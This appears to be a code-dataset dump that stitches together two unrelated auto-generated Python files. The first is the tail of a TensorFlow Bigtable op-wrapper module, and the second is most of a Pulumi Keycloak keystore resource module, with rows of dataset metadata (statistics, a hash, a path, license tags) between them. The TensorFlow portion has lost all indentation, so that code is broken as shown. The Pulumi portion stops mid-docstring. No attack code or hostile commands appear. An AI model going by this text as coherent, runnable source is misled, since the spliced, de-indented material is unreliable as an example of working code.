prefix: A `Tensor` of type `string`.
start_key: A `Tensor` of type `string`.
end_key: A `Tensor` of type `string`.
column_families: A `Tensor` of type `string`.
columns: A `Tensor` of type `string`.
probability: A `Tensor` of type `float32`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableScanDataset", table=table, prefix=prefix,
start_key=start_key, end_key=end_key, column_families=column_families,
columns=columns, probability=probability, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtableScanDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableScanDataset", name, _ctx._post_execution_callbacks, table,
prefix, start_key, end_key, column_families, columns, probability)
return _result
except _core._FallbackException:
return bigtable_scan_dataset_eager_fallback(
table, prefix, start_key, end_key, column_families, columns,
probability, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_scan_dataset_eager_fallback(table, prefix, start_key, end_key, column_families, columns, probability, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_scan_dataset
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
columns = _ops.convert_to_tensor(columns, _dtypes.string)
probability = _ops.convert_to_tensor(probability, _dtypes.float32)
_inputs_flat = [table, prefix, start_key, end_key, column_families, columns, probability]
_attrs = None
_result = _execute.execute(b"BigtableScanDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BigtableScanDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableScanDataset")(None)
@tf_export('bigtable_table')
def bigtable_table(client, table_name, container="", shared_name="", name=None):
r"""TODO: add doc.
Args:
client: A `Tensor` of type `resource`.
table_name: A `string`.
container: An optional `string`. Defaults to `""`.
shared_name: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
table_name = _execute.make_str(table_name, "table_name")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableTable", client=client, table_name=table_name,
container=container, shared_name=shared_name, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("table_name", _op.get_attr("table_name"), "container",
_op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"))
_execute.record_gradient(
"BigtableTable", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableTable", name, _ctx._post_execution_callbacks, client,
"table_name", table_name, "container", container, "shared_name",
shared_name)
return _result
except _core._FallbackException:
return bigtable_table_eager_fallback(
client, table_name=table_name, container=container,
shared_name=shared_name, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_table_eager_fallback(client, table_name, container="", shared_name="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_table
"""
_ctx = ctx if ctx else _context.context()
table_name = _execute.make_str(table_name, "table_name")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
client = _ops.convert_to_tensor(client, _dtypes.resource)
_inputs_flat = [client]
_attrs = ("table_name", table_name, "container", container, "shared_name",
shared_name)
_result = _execute.execute(b"BigtableTable", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BigtableTable", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableTable")(None)
@tf_export('dataset_to_bigtable')
def dataset_to_bigtable(table, input_dataset, column_families, columns, timestamp, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
input_dataset: A `Tensor` of type `variant`.
column_families: A `Tensor` of type `string`.
columns: A `Tensor` of type `string`.
timestamp: A `Tensor` of type `int64`.
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"DatasetToBigtable", table=table, input_dataset=input_dataset,
column_families=column_families, columns=columns, timestamp=timestamp,
name=name)
return _op
_result = None
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"DatasetToBigtable", name, _ctx._post_execution_callbacks, table,
input_dataset, column_families, columns, timestamp)
return _result
except _core._FallbackException:
return dataset_to_bigtable_eager_fallback(
table, input_dataset, column_families, columns, timestamp,
name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def dataset_to_bigtable_eager_fallback(table, input_dataset, column_families, columns, timestamp, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function dataset_to_bigtable
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
columns = _ops.convert_to_tensor(columns, _dtypes.string)
timestamp = _ops.convert_to_tensor(timestamp, _dtypes.int64)
_inputs_flat = [table, input_dataset, column_families, columns, timestamp]
_attrs = None
_result = _execute.execute(b"DatasetToBigtable", 0, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_result = None
return _result
_ops.RegisterShape("DatasetToBigtable")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BigtableClient"
# output_arg {
# name: "client"
# type: DT_RESOURCE
# }
# attr {
# name: "project_id"
# type: "string"
# }
# attr {
# name: "instance_id"
# type: "string"
# }
# attr {
# name: "connection_pool_size"
# type: "int"
# }
# attr {
# name: "max_receive_message_size"
# type: "int"
# default_value {
# i: -1
# }
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "BigtableLookupDataset"
# input_arg {
# name: "keys_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtablePrefixKeyDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableRangeKeyDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableSampleKeyPairsDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableSampleKeysDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableScanDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# input_arg {
# name: "probability"
# type: DT_FLOAT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableTable"
# input_arg {
# name: "client"
# type: DT_RESOURCE
# }
# output_arg {
# name: "table"
# type: DT_RESOURCE
# }
# attr {
# name: "table_name"
# type: "string"
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "DatasetToBigtable"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# input_arg {
# name: "timestamp"
# type: DT_INT64
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\313\001\n\016BigtableClient\032\n\n\006client\030\024\"\024\n\nproject_id\022\006string\"\025\n\013instance_id\022\006string\"\033\n\024connection_pool_size\022\003int\",\n\030max_receive_message_size\022\003int\032\013\030\377\377\377\377\377\377\377\377\377\001\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\ne\n\025BigtableLookupDataset\022\020\n\014keys_dataset\030\025\022\t\n\005table\030\024\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\032\n\n\006handle\030\025\210\001\001\n@\n\030BigtablePrefixKeyDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\032\n\n\006handle\030\025\210\001\001\nO\n\027BigtableRangeKeyDataset\022\t\n\005table\030\024\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\032\n\n\006handle\030\025\210\001\001\na\n\035BigtableSampleKeyPairsDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\032\n\n\006handle\030\025\210\001\001\n5\n\031BigtableSampleKeysDataset\022\t\n\005table\030\024\032\n\n\006handle\030\025\210\001\001\n\212\001\n\023BigtableScanDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\022\017\n\013probability\030\001\032\n\n\006handle\030\025\210\001\001\ns\n\rBigtableTable\022\n\n\006client\030\024\032\t\n\005table\030\024\"\024\n\ntable_name\022\006string\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\ne\n\021DatasetToBigtable\022\t\n\005table\030\024\022\021\n\rinput_dataset\030\025\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\022\r\n\ttimestamp\030\t\210\001\001")
| 34.995585 | 1,847 | 0.697723 | 4,065 | 31,706 | 5.062731 | 0.057565 | 0.023324 | 0.015306 | 0.022109 | 0.830661 | 0.791837 | 0.754859 | 0.72483 | 0.705782 | 0.69587 | 0 | 0.029936 | 0.195073 | 31,706 | 905 | 1,848 | 35.034254 | 0.776459 | 0.214817 | 0 | 0.665996 | 1 | 0.006036 | 0.140875 | 0.099774 | 0 | 0 | 0 | 0.009945 | 0 | 1 | 0.038229 | false | 0 | 0.030181 | 0 | 0.144869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
48635502a06ad262110ba2073e2ad74d2acbf9a0 | 36 | py | Python | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | def jotaro():
return "yare yare" | 18 | 22 | 0.638889 | 5 | 36 | 4.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 36 | 2 | 22 | 18 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6f97d9e84aacbeedb0fb85c2706ebb829b222067 | 23,940 | py | Python | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 13 | 2020-04-28T15:20:56.000Z | 2022-03-24T18:00:17.000Z | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 49 | 2020-02-06T17:53:35.000Z | 2022-03-25T19:36:08.000Z | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-06-09T01:08:56.000Z | 2021-12-07T15:30:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['RealmKeystoreJavaGeneratedArgs', 'RealmKeystoreJavaGenerated']
@pulumi.input_type
class RealmKeystoreJavaGeneratedArgs:
def __init__(__self__, *,
key_alias: pulumi.Input[str],
key_password: pulumi.Input[str],
keystore: pulumi.Input[str],
keystore_password: pulumi.Input[str],
realm_id: pulumi.Input[str],
active: Optional[pulumi.Input[bool]] = None,
algorithm: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a RealmKeystoreJavaGenerated resource.
:param pulumi.Input[str] key_alias: Alias for the private key
:param pulumi.Input[str] key_password: Password for the private key
:param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
:param pulumi.Input[str] keystore_password: Password for the private key.
:param pulumi.Input[str] realm_id: The realm this keystore exists in.
:param pulumi.Input[bool] active: When `false`, key in not used for signing. Defaults to `true`.
:param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
:param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
:param pulumi.Input[str] name: Display name of provider when linked in admin console.
:param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
"""
pulumi.set(__self__, "key_alias", key_alias)
pulumi.set(__self__, "key_password", key_password)
pulumi.set(__self__, "keystore", keystore)
pulumi.set(__self__, "keystore_password", keystore_password)
pulumi.set(__self__, "realm_id", realm_id)
if active is not None:
pulumi.set(__self__, "active", active)
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
@property
@pulumi.getter(name="keyAlias")
def key_alias(self) -> pulumi.Input[str]:
"""
Alias for the private key
"""
return pulumi.get(self, "key_alias")
@key_alias.setter
def key_alias(self, value: pulumi.Input[str]):
pulumi.set(self, "key_alias", value)
@property
@pulumi.getter(name="keyPassword")
def key_password(self) -> pulumi.Input[str]:
"""
Password for the private key
"""
return pulumi.get(self, "key_password")
@key_password.setter
def key_password(self, value: pulumi.Input[str]):
pulumi.set(self, "key_password", value)
@property
@pulumi.getter
def keystore(self) -> pulumi.Input[str]:
"""
Path to keys file on keycloak instance.
"""
return pulumi.get(self, "keystore")
@keystore.setter
def keystore(self, value: pulumi.Input[str]):
pulumi.set(self, "keystore", value)
@property
@pulumi.getter(name="keystorePassword")
def keystore_password(self) -> pulumi.Input[str]:
"""
Password for the private key.
"""
return pulumi.get(self, "keystore_password")
@keystore_password.setter
def keystore_password(self, value: pulumi.Input[str]):
pulumi.set(self, "keystore_password", value)
@property
@pulumi.getter(name="realmId")
def realm_id(self) -> pulumi.Input[str]:
"""
The realm this keystore exists in.
"""
return pulumi.get(self, "realm_id")
@realm_id.setter
def realm_id(self, value: pulumi.Input[str]):
pulumi.set(self, "realm_id", value)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
When `false`, key in not used for signing. Defaults to `true`.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[str]]:
"""
Intended algorithm for the key. Defaults to `RS256`
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
When `false`, key is not accessible in this realm. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Display name of provider when linked in admin console.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
Priority for the provider. Defaults to `0`
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@pulumi.input_type
class _RealmKeystoreJavaGeneratedState:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
algorithm: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
key_alias: Optional[pulumi.Input[str]] = None,
key_password: Optional[pulumi.Input[str]] = None,
keystore: Optional[pulumi.Input[str]] = None,
keystore_password: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
realm_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RealmKeystoreJavaGenerated resources.
:param pulumi.Input[bool] active: When `false`, key in not used for signing. Defaults to `true`.
:param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
:param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
:param pulumi.Input[str] key_alias: Alias for the private key
:param pulumi.Input[str] key_password: Password for the private key
:param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
:param pulumi.Input[str] keystore_password: Password for the private key.
:param pulumi.Input[str] name: Display name of provider when linked in admin console.
:param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
:param pulumi.Input[str] realm_id: The realm this keystore exists in.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if key_alias is not None:
pulumi.set(__self__, "key_alias", key_alias)
if key_password is not None:
pulumi.set(__self__, "key_password", key_password)
if keystore is not None:
pulumi.set(__self__, "keystore", keystore)
if keystore_password is not None:
pulumi.set(__self__, "keystore_password", keystore_password)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if realm_id is not None:
pulumi.set(__self__, "realm_id", realm_id)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
When `false`, key in not used for signing. Defaults to `true`.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[str]]:
"""
Intended algorithm for the key. Defaults to `RS256`
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
When `false`, key is not accessible in this realm. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="keyAlias")
def key_alias(self) -> Optional[pulumi.Input[str]]:
"""
Alias for the private key
"""
return pulumi.get(self, "key_alias")
@key_alias.setter
def key_alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_alias", value)
@property
@pulumi.getter(name="keyPassword")
def key_password(self) -> Optional[pulumi.Input[str]]:
"""
Password for the private key
"""
return pulumi.get(self, "key_password")
@key_password.setter
def key_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_password", value)
@property
@pulumi.getter
def keystore(self) -> Optional[pulumi.Input[str]]:
"""
Path to keys file on keycloak instance.
"""
return pulumi.get(self, "keystore")
@keystore.setter
def keystore(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "keystore", value)
@property
@pulumi.getter(name="keystorePassword")
def keystore_password(self) -> Optional[pulumi.Input[str]]:
"""
Password for the private key.
"""
return pulumi.get(self, "keystore_password")
@keystore_password.setter
def keystore_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "keystore_password", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Display name of provider when linked in admin console.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
Priority for the provider. Defaults to `0`
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="realmId")
def realm_id(self) -> Optional[pulumi.Input[str]]:
"""
The realm this keystore exists in.
"""
return pulumi.get(self, "realm_id")
@realm_id.setter
def realm_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "realm_id", value)
class RealmKeystoreJavaGenerated(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
algorithm: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
key_alias: Optional[pulumi.Input[str]] = None,
key_password: Optional[pulumi.Input[str]] = None,
keystore: Optional[pulumi.Input[str]] = None,
keystore_password: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
realm_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Allows for creating and managing `java-keystore` Realm keystores within Keycloak.
A realm keystore manages generated key pairs that are used by Keycloak to perform cryptographic signatures and encryption.
## Import
Realm keys can be imported using realm name and keystore id, you can find it in web UI. Examplebash
```sh
$ pulumi import keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated java_keystore my-realm/my-realm/618cfba7-49aa-4c09-9a19-2f699b576f0b
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: When `false`, key in not used for signing. Defaults to `true`.
:param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
:param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
:param pulumi.Input[str] key_alias: Alias for the private key
:param pulumi.Input[str] key_password: Password for the private key
:param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
:param pulumi.Input[str] keystore_password: Password for the private key.
:param pulumi.Input[str] name: Display name of provider when linked in admin console.
:param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
:param pulumi.Input[str] realm_id: The realm this keystore exists in.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RealmKeystoreJavaGeneratedArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows for creating and managing `java-keystore` Realm keystores within Keycloak.
A realm keystore manages generated key pairs that are used by Keycloak to perform cryptographic signatures and encryption.
## Import
Realm keys can be imported using realm name and keystore id, you can find it in web UI. Examplebash
```sh
$ pulumi import keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated java_keystore my-realm/my-realm/618cfba7-49aa-4c09-9a19-2f699b576f0b
```
:param str resource_name: The name of the resource.
:param RealmKeystoreJavaGeneratedArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RealmKeystoreJavaGeneratedArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
algorithm: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
key_alias: Optional[pulumi.Input[str]] = None,
key_password: Optional[pulumi.Input[str]] = None,
keystore: Optional[pulumi.Input[str]] = None,
keystore_password: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
realm_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RealmKeystoreJavaGeneratedArgs.__new__(RealmKeystoreJavaGeneratedArgs)
__props__.__dict__["active"] = active
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["enabled"] = enabled
if key_alias is None and not opts.urn:
raise TypeError("Missing required property 'key_alias'")
__props__.__dict__["key_alias"] = key_alias
if key_password is None and not opts.urn:
raise TypeError("Missing required property 'key_password'")
__props__.__dict__["key_password"] = key_password
if keystore is None and not opts.urn:
raise TypeError("Missing required property 'keystore'")
__props__.__dict__["keystore"] = keystore
if keystore_password is None and not opts.urn:
raise TypeError("Missing required property 'keystore_password'")
__props__.__dict__["keystore_password"] = keystore_password
__props__.__dict__["name"] = name
__props__.__dict__["priority"] = priority
if realm_id is None and not opts.urn:
raise TypeError("Missing required property 'realm_id'")
__props__.__dict__["realm_id"] = realm_id
super(RealmKeystoreJavaGenerated, __self__).__init__(
'keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
algorithm: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
key_alias: Optional[pulumi.Input[str]] = None,
key_password: Optional[pulumi.Input[str]] = None,
keystore: Optional[pulumi.Input[str]] = None,
keystore_password: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
realm_id: Optional[pulumi.Input[str]] = None) -> 'RealmKeystoreJavaGenerated':
"""
Get an existing RealmKeystoreJavaGenerated resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: When `false`, key in not used for signing. Defaults to `true`.
:param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
:param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
:param pulumi.Input[str] key_alias: Alias for the private key
:param pulumi.Input[str] key_password: Password for the private key
:param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
:param pulumi.Input[str] keystore_password: Password for the private key.
:param pulumi.Input[str] name: Display name of provider when linked in admin console.
